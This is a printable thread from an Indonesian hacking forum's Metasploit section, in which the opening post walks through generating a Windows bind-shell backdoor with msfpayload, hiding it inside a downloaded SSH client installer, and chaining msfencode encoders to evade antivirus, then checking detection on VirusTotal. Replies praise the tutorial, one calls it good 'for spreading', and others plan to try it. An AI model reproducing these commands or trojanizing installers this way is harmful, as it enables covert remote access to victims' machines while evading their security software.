Indonesian Back|Track Team
Share Bypass Antivirus Detection Making An Executable Fully Undetectable - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Share Bypass Antivirus Detection Making An Executable Fully Undetectable (/thread-5958.html)



Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-15-2014

Oke kali ini saya akan jelaskan bagaimana membypass backdoor dari semua antivirus.

Tujuan :
Antivirus melindungi mesin dari malware tetapi tidak semuanya dengan cara untuk mengemas malware untuk membuat lebih sulit untuk dideteksi, dengan menggunakan metasploit untuk membuat malware sama sekali tak terlihat untuk antivirus.

Jalankan service postgresql dan metasploit

Code:
service postgresql start
service metasploit start

Creating Listener


Code:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

[Image: image.png]

Di folder /root akan tersimpan listen.exe

Encoding Listener

Code:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1

[Image: image.png]

Di folder /root akan tersimpan evil_ssh.exe

Code:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1

[Image: image.png]

Di folder /root akan tersimpan listen.exe, evil_ssh.exe, listen2.exe, listen3.exe, listen4.exe, listen5.exe

Setelah itu scan backdoor yang sudah kita buat di :
https://www.virustotal.com


Hasilnya :

[Image: image.png]


Terima Kasih.
Maaf kalo repost.



RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - czeroo_cool - 08-15-2014

Anjret sekarang kok gak kedetect virus ya, gw make encode 4 encode sama kaya lu dulu kena virus tuh. ahahah +1 dari gw


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-16-2014

(08-15-2014, 07:19 PM)czeroo_cool Wrote: Anjret sekarang kok gak kedetect virus ya, gw make encode 4 encode sama kaya lu dulu kena virus tuh. ahahah +1 dari gw

Terima kasih bro....
sekarang udah keren bro,,,makin maknyuss...


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - wine trochanter - 08-16-2014

+1 dari ane
mantap bro
ane compile automatis aja ya tar Big Grin


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-18-2014

(08-16-2014, 10:30 PM)wine trochanter Wrote: +1 dari ane
mantap bro
ane compile automatis aja ya tar Big Grin

makasih bro..
oke bro bener, biar gampang.....


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - dimascyber4rt - 08-20-2014

wah mantap nih buat ditebar haha.. thanks bro tutsnya hehe..


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - kunang - 08-20-2014

Mantep wa tutornya....ane kalah start lagi aja ni..
Oy oy oyyyy...kumpulin tutorial tutorialnya tar kalo ane dah beres KKN mau merapat ke markas mau berguru sambil ngoprek bareng lagi


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - giecl9 - 08-21-2014

(08-20-2014, 07:05 AM)kunang Wrote: Mantep wa tutornya....ane kalah start lagi aja ni..
Oy oy oyyyy...kumpulin tutorial tutorialnya tar kalo ane dah beres KKN mau merapat ke markas mau berguru sambil ngoprek bareng lagi

hayu tanggal 5-6 September 2014 bantuin gw....

(08-20-2014, 06:10 AM)dimascyber4rt Wrote: wah mantap nih buat ditebar haha.. thanks bro tutsnya hehe..

oke bro sama2 silahkan jajal ya bro...


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - 4uth0r1ty - 10-12-2015

NAH kalau yang APK bisa Gk om?


RE: Bypass Antivirus Detection Making An Executable Fully Undetectable - alle zaen - 10-14-2015

mantap nih, langsung tak praktekin.
Thanks om... Smile